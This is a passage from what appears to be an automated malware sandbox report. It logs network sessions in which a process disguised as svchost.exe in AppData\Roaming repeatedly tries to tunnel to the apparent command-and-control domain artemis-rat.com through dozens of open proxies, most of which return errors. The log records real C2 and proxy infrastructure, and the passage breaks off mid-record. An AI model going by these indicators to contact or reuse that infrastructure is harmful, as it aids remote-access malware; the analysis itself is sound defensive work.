Mar 9, 2024 13:14:32.622195959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646107912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.333599091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.442946911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2954	192.168.2.5	59622	172.67.181.197	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.654493093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.808835983 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2955	192.168.2.5	59065	129.151.72.85	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.667721033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2956	192.168.2.5	59566	38.162.0.221	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.668394089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.116548061 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2957	192.168.2.5	59590	45.196.151.97	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.668921947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.886904955 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2958	192.168.2.5	59544	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.669022083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380436897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380511999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2959	192.168.2.5	59509	61.111.38.5	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.669367075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.965749979 CET	507	IN	HTTP/1.1 502 Proxy Error Date: Sat, 09 Mar 2024 12:14:35 GMT Server: Apache Content-Length: 341 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2960	192.168.2.5	59501	203.95.198.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.671431065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.033875942 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2961	192.168.2.5	59600	159.203.61.169	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.671653032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.601818085 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2962	192.168.2.5	59557	5.161.179.239	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.674834013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.333343029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146239996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646285057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333844900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2963	192.168.2.5	59517	43.155.142.116	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.683831930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2964	192.168.2.5	59531	8.210.80.191	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.684441090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2965	192.168.2.5	59628	162.241.137.197	61041	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.709203005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.333595037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.942903996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146311998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646205902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2966	192.168.2.5	59636	142.54.228.193	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.719517946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2967	192.168.2.5	59652	74.48.7.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.726165056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2968	192.168.2.5	59093	138.68.60.8	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.727540016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.904683113 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2969	192.168.2.5	59675	45.14.174.180	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.729897976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.884191036 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2970	192.168.2.5	59690	104.21.66.184	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.734441996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.888814926 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2971	192.168.2.5	59669	162.159.242.109	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.734441996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.897368908 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2972	192.168.2.5	59691	104.23.107.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.739305019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.893975973 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2973	192.168.2.5	57273	51.15.210.79	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.742451906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.442588091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.349536896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146413088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2974	192.168.2.5	59533	103.49.202.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.747858047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2975	192.168.2.5	59713	192.154.246.96	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.785022974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2976	192.168.2.5	59734	172.67.14.237	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.785037994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.941163063 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2977	192.168.2.5	59719	162.159.250.145	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.785187006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
